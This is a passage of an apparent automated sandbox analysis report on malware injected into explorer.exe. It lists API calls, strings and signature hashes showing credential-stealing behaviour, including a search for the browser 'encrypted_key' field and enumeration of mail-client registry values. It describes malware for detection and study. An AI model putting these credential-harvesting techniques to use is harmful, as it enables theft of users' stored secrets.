                                                                          • Part of subcall function 03271BC5: StrStrIW.SHLWAPI(00000000,.exe,?,03272E75,PathToExe,00000000,00000000), ref: 03271BF0
                                                                          • Part of subcall function 03271BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03272E75,PathToExe,00000000,00000000), ref: 03271C05
                                                                          • Part of subcall function 03271BC5: lstrlenW.KERNEL32(00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271C1C
                                                                          • Part of subcall function 03271AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03272E83,PathToExe,00000000,00000000), ref: 03271B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                        • String ID: PathToExe
                                                                        • API String ID: 1799103994-1982016430
                                                                        • Opcode ID: cd89d07a5d353e069017a6617c5d19254ea7497dfcd0ee7ddd6ce9c89a919e5c
                                                                        • Instruction ID: 0b9a86501c461dbb517d44eb426c01112f55423fa8e148b0c080ff41caffc1b8
                                                                        • Opcode Fuzzy Hash: cd89d07a5d353e069017a6617c5d19254ea7497dfcd0ee7ddd6ce9c89a919e5c
                                                                        • Instruction Fuzzy Hash: E331AF35624312AF8715EF228808C7FBAA9FFC8250F04851CFC558B244DA70E996DBE1

                                                                         Control-flow Graph: function 0327A67C-0327A740; its blocks call 0327A33B, 0327A1C6, _alldiv, _allmul and SetEndOfFile
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File_alldiv_allmul
                                                                        • String ID: winTruncate1$winTruncate2
                                                                        • API String ID: 3568847005-470713972
                                                                        • Opcode ID: bce29cde9a9360481c9967d8dc184629fbbec23bdd31f3825c2425d146c25b43
                                                                        • Instruction ID: ec0c9a841d58fce9f086f57d2c986a0672b224c5ed460869ba1e20e5649f6ae2
                                                                        • Opcode Fuzzy Hash: bce29cde9a9360481c9967d8dc184629fbbec23bdd31f3825c2425d146c25b43
                                                                        • Instruction Fuzzy Hash: C421CC72221240ABDF24DE2DCC84EAF77A9FF84320B158169ED14CB385D671E890CBA1
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • wsprintfW.USER32 ref: 03274AA2
                                                                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 03274AC7
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03274AD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                        • String ID: %s\%08x$Software
                                                                        • API String ID: 1800864259-1658101971
                                                                        • Opcode ID: 814c197c066b37b304e73a355e36bde2917c6e56ae2b6c4618a5d3c9ce21d112
                                                                        • Instruction ID: 25ee96b8baf9edc53f44d1d031777e27274eec0b71f05d68ae0c1b512c0baadc
                                                                        • Opcode Fuzzy Hash: 814c197c066b37b304e73a355e36bde2917c6e56ae2b6c4618a5d3c9ce21d112
                                                                        • Instruction Fuzzy Hash: 0A01F275620108BFDB18EF95EC8EDBF77ADFB40344B44016EF905A3101EBB06E9096A0
                                                                        APIs
                                                                        • _alloca_probe.NTDLL ref: 0327431C
                                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 03274335
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 03274363
                                                                        • RegCloseKey.ADVAPI32(?), ref: 032743C8
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                          • Part of subcall function 0327418A: wsprintfW.USER32 ref: 03274212
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 032743B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                        • String ID:
                                                                        • API String ID: 801677237-0
                                                                        • Opcode ID: 1bca3914d5fcfd6cd38a97f70a01c0d08c663e021c16fe979191f2679dda866d
                                                                        • Instruction ID: b751f666d67d8f5d4b8e4d3dbc27c598c11886f65d6a9de80d97a2e1adc553cf
                                                                        • Opcode Fuzzy Hash: 1bca3914d5fcfd6cd38a97f70a01c0d08c663e021c16fe979191f2679dda866d
                                                                        • Instruction Fuzzy Hash: 071133B5124205AFE715EB11DC48DBF77DDFF84344F04462DB449D2150EBB4ED849A62
                                                                        APIs
                                                                        • memset.NTDLL ref: 0327B8D5
                                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0327B96F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFilememset
                                                                        • String ID: psow$winOpen
                                                                        • API String ID: 2416746761-4101858489
                                                                        • Opcode ID: 4aa3bf306232f1f9975c66dae5abf7b879242828372fee67ece640ac0a7321bc
                                                                        • Instruction ID: 00bec5ae0c5a902a271c58cbe1cfaf41da388f07a32e0b28561dc8c3f9e22893
                                                                        • Opcode Fuzzy Hash: 4aa3bf306232f1f9975c66dae5abf7b879242828372fee67ece640ac0a7321bc
                                                                        • Instruction Fuzzy Hash: 45718071A24702DFD750EF29D88175ABBE4FF48724F044A2DF8649B280D7B4D994CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.00000000032D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 032D7000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_32d7000_explorer.jbxd
                                                                        • Opcode ID: 4a9b287179512c20758f9f487271b1f33b5bf3eae84b45801cb523c10e825a01
                                                                        • Instruction ID: b2022ce0733d54073f66468c120517f3ec43859fcd481279d820e99510a2160a
                                                                        • Opcode Fuzzy Hash: 4a9b287179512c20758f9f487271b1f33b5bf3eae84b45801cb523c10e825a01
                                                                        • Instruction Fuzzy Hash: F8A139729247925FD721CF78DCC46A0BBA5EB42324B1C07ACE5D18B2C3E7A054CAC751
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                        • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 217796345-0
                                                                        • Opcode ID: 5d840ab353f8a649a7b9e0c34af211cc9d193933b6a46e40f761d12abeab8336
                                                                        • Instruction ID: f9e30be9f1f226e2552df9abe7db2bab58b9f9729816bea95c136771918ba385
                                                                        • Opcode Fuzzy Hash: 5d840ab353f8a649a7b9e0c34af211cc9d193933b6a46e40f761d12abeab8336
                                                                        • Instruction Fuzzy Hash: 6621B172224342AFE724CA21DD08F3BB7ECFFC8744F084A2DF98692140E670E990C661
                                                                        APIs
                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 03271ED5
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03271F0C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 03271F98
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03271F82
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 1077800024-0
                                                                        • Opcode ID: a80d16b6183a330e3048c50740e1ae6f1b44a8759ebff83cbe00a6c15886f057
                                                                        • Instruction ID: 9da3dbb98c836c704903d891261ba1ea0193ea5e56ed420a3ac89850084229ab
                                                                        • Opcode Fuzzy Hash: a80d16b6183a330e3048c50740e1ae6f1b44a8759ebff83cbe00a6c15886f057
                                                                        • Instruction Fuzzy Hash: EA219D71228301AFD705AB21DC48E3FBBEDFFC8244F04892DF89992150DB75E9659B62
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03273E1E,00000000,?,03273FA8), ref: 03271C46
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,03273FA8), ref: 03271C56
                                                                        • CloseHandle.KERNELBASE(00000000,?,03273FA8), ref: 03271C91
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03273FA8), ref: 03271C76
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                        • String ID:
                                                                        • API String ID: 2517252058-0
                                                                        • Opcode ID: b7a5cb366188cad9cc1f06ca21384d25693e1f5ddb09a9687234749152c966d0
                                                                        • Instruction ID: af115a4d752c6577e8bdda6b5be001e09112ae571bfe4896995196634a461e25
                                                                        • Opcode Fuzzy Hash: b7a5cb366188cad9cc1f06ca21384d25693e1f5ddb09a9687234749152c966d0
                                                                        • Instruction Fuzzy Hash: 9FF028322202187BD320AA66EC8DF7B7A5CFF466F6F1A031CF805921C0DB7278918171
                                                                        APIs
                                                                        • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03273E30,00000000,00000000,?,03273FA8), ref: 03272FC1
                                                                        • lstrlen.KERNEL32("encrypted_key":",?,03273FA8), ref: 03272FCE
                                                                        • StrStrIA.SHLWAPI("encrypted_key":",032C692C,?,03273FA8), ref: 03272FDD
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(?,?,?,?,00000000,03272783), ref: 0327192B
                                                                          • Part of subcall function 0327190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03272783), ref: 03271930
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,?), ref: 03271946
                                                                          • Part of subcall function 0327190B: lstrcat.KERNEL32(00000000,00000000), ref: 0327194A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcat
                                                                        • String ID: "encrypted_key":"
                                                                        • API String ID: 493641738-877455259
                                                                        • Opcode ID: 0e7962468f37f4cd111f0334417c979694be83d130f8aab564162d1a315eca46
                                                                        • Instruction ID: fe260829b579ca5ac4c23c345acba5e98a22bd74172437c864f01d7b1c3025c5
                                                                        • Opcode Fuzzy Hash: 0e7962468f37f4cd111f0334417c979694be83d130f8aab564162d1a315eca46
                                                                        • Instruction Fuzzy Hash: 47E09B627357669F8361FBB92C48847BF58AE4741130D4068E541D7202DEE19442D2A5
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0327BB40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID: winDelete
                                                                        • API String ID: 3188754299-3936022152
                                                                        • Opcode ID: 4db75bcfd7f2724feb7cdf9f0218ecce280dafbc88f30cb5b489599e5ab2a3e6
                                                                        • Instruction ID: 1b8f23e9b7425ef82896fd3432d54704b2b36dfc850cd9a4a56a67ac24811a6f
                                                                        • Opcode Fuzzy Hash: 4db75bcfd7f2724feb7cdf9f0218ecce280dafbc88f30cb5b489599e5ab2a3e6
                                                                        • Instruction Fuzzy Hash: 86114834A20209EBDB10EB649849C7D7779FF81720F149155EC02D7288DB7099918782
                                                                        APIs
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03272EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03272F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03272F62
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                        • String ID:
                                                                        • API String ID: 1066184869-0
                                                                        • Opcode ID: 921c51bfb5babf5460d567cda171ec4271d218b0679499a92e54e8fb67a9d8bd
                                                                        • Instruction ID: 2a6b667f01f470db5637c7ee6a48a8720c208c6bdde142e72741d818db36ae54
                                                                        • Opcode Fuzzy Hash: 921c51bfb5babf5460d567cda171ec4271d218b0679499a92e54e8fb67a9d8bd
                                                                        • Instruction Fuzzy Hash: A601A235224351ABC715EF22DC08E6FBBA9FFC4350F04442DF80996144DB759895EBE2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                        • String ID:
                                                                        • API String ID: 4175140541-0
                                                                        • Opcode ID: a4e24f65892e73e846c38c19616a9fa5b55211c02cd9dbcd40c616fdc44ad8b9
                                                                        • Instruction ID: 09a59f9544eca0982e2177d143b7edf0e1a671b9a0f89571011bf17bcc64415c
                                                                        • Opcode Fuzzy Hash: a4e24f65892e73e846c38c19616a9fa5b55211c02cd9dbcd40c616fdc44ad8b9
                                                                        • Instruction Fuzzy Hash: 7BC04C362642014BE7807BF27C0E7093518BF05B13F089000E20589084DAA454408623
                                                                        APIs
                                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 03279FF8
                                                                        Strings
                                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0327A00E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHeap
                                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                        • API String ID: 10892065-982776804
                                                                        • Opcode ID: 677e9f62cbd4d403beba607afba640656ae1fdcd413c08f147ab79f1a8a20c17
                                                                        • Instruction ID: e29b249320cff353ff353de90465632d0075863b19ec57e7f61e61c21377bf74
                                                                        • Opcode Fuzzy Hash: 677e9f62cbd4d403beba607afba640656ae1fdcd413c08f147ab79f1a8a20c17
                                                                        • Instruction Fuzzy Hash: 84F02B73B34342BEE730EA98AC88F3B679CF785795F144819F94596284E3B06CC18671
                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03272E83,PathToExe,00000000,00000000), ref: 03271B16
                                                                          • Part of subcall function 03271011: GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                          • Part of subcall function 03271011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 03271B40
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 2162223993-2036018995
                                                                        • Opcode ID: e02642219ab48ffe4846f17a62e2cadfa5e79583690850645f13b013bb06cd55
                                                                        • Instruction ID: bdf56807533405343b55b62f8a88578834f8f09d3e22a2a283e399c83cbc2fbf
                                                                        • Opcode Fuzzy Hash: e02642219ab48ffe4846f17a62e2cadfa5e79583690850645f13b013bb06cd55
                                                                        • Instruction Fuzzy Hash: 34F0242772064827C220B96BDC88E6B364EEFC12A631A0029F81987241EE327CA15270
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0327A35F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID: winSeekFile
                                                                        • API String ID: 973152223-3168307952
                                                                        • Opcode ID: 49a911f73ac9d2febf5d8427f609447f2074500d641581e925abd0ca5c6b6d3f
                                                                        • Instruction ID: 0eed61a56b8424301c0dab1b64ab01bfb80d513caa7f175e77789d7035acb744
                                                                        • Opcode Fuzzy Hash: 49a911f73ac9d2febf5d8427f609447f2074500d641581e925abd0ca5c6b6d3f
                                                                        • Instruction Fuzzy Hash: E3F09030A25204AFE711DE64EC049BA77A9FB45331B14C36ABC61CA7C4DA70DD509AA1
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(05450000,00000000,?), ref: 03279EB5
                                                                        Strings
                                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 03279ECD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                        • API String ID: 1279760036-667713680
                                                                        • Opcode ID: f389671102a8b91a377049ae74157a00d607c2e3aaa63dbf43084ed5d5ea5874
                                                                        • Instruction ID: 071051701148c7a19d1336a7b2877cd9b0b2c3b8ce35f8be2ec3c62d8bb94370
                                                                        • Opcode Fuzzy Hash: f389671102a8b91a377049ae74157a00d607c2e3aaa63dbf43084ed5d5ea5874
                                                                        • Instruction Fuzzy Hash: 46E0C237A14311BFC2127688BC08F2FB768EB84F10F058015FA00A6A09C670A8A2D7E2
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(05450000,00000000,?), ref: 03279EF8
                                                                        Strings
                                                                        • failed to HeapFree block %p (%lu), heap=%p, xrefs: 03279F0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                        • API String ID: 3298025750-4030396798
                                                                        • Opcode ID: d4c4e5c926c5b6e6b8158d1b4de09da8c6fd9bd9f530b13b1dc24668e3bc4a0a
                                                                        • Instruction ID: 955a3b5a1fb410f59ea125603da25759e7915edd1fec5c82d9c1613194d6b2e5
                                                                        • Opcode Fuzzy Hash: d4c4e5c926c5b6e6b8158d1b4de09da8c6fd9bd9f530b13b1dc24668e3bc4a0a
                                                                        • Instruction Fuzzy Hash: D6D01277658302BBD241AA54BC09F3B777DAB95A00F494419F11495459D37060E2AF62
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID:
                                                                        • API String ID: 3498533004-0
                                                                        • Opcode ID: 549a3bc1980c17d3d36cec6403388f12fdcefb07ea9fa269e247cf36deff729f
                                                                        • Instruction ID: 57d122b060ac359d54c159a82bea10acf51e56e94b89e14b6a0703deac254039
                                                                        • Opcode Fuzzy Hash: 549a3bc1980c17d3d36cec6403388f12fdcefb07ea9fa269e247cf36deff729f
                                                                        • Instruction Fuzzy Hash: 53D01771263631A2E5B5A6357C0CFA7AE1CFF02AB5B0C4614B41DE54C8E22498D782E0
                                                                        APIs
                                                                          • Part of subcall function 03271162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0327116F
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,03271A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2), ref: 03271020
                                                                        • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271027
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcessQueryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2580854192-0
                                                                        • Opcode ID: af7b2b191bae4483a7f21cad41e372cf28882eb2caa5cc89cdd4cada5bfa4f80
                                                                        • Instruction ID: c50f78a474d2611c15c8432f0c3e3a12f4c101f2a12da5397f7e5f0c59d93afe
                                                                        • Opcode Fuzzy Hash: af7b2b191bae4483a7f21cad41e372cf28882eb2caa5cc89cdd4cada5bfa4f80
                                                                        • Instruction Fuzzy Hash: D3C08C3202022052C96077A1380CBDB2B08EF09923F080081B8419B245CAF1888082A0
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 5b4a5855429f69d9419aece50287c22d9adba39d55f283791fb1c2c4bb251b24
                                                                        • Instruction ID: dadd0eadbba971dd463aea72c56548e869fba0f7df1880da9b4e34beee106dfd
                                                                        • Opcode Fuzzy Hash: 5b4a5855429f69d9419aece50287c22d9adba39d55f283791fb1c2c4bb251b24
                                                                        • Instruction Fuzzy Hash: 50A002B55601045FDD4477A5BA0DB1A3518FB44B03F148544718586545D9E454048721
                                                                        APIs
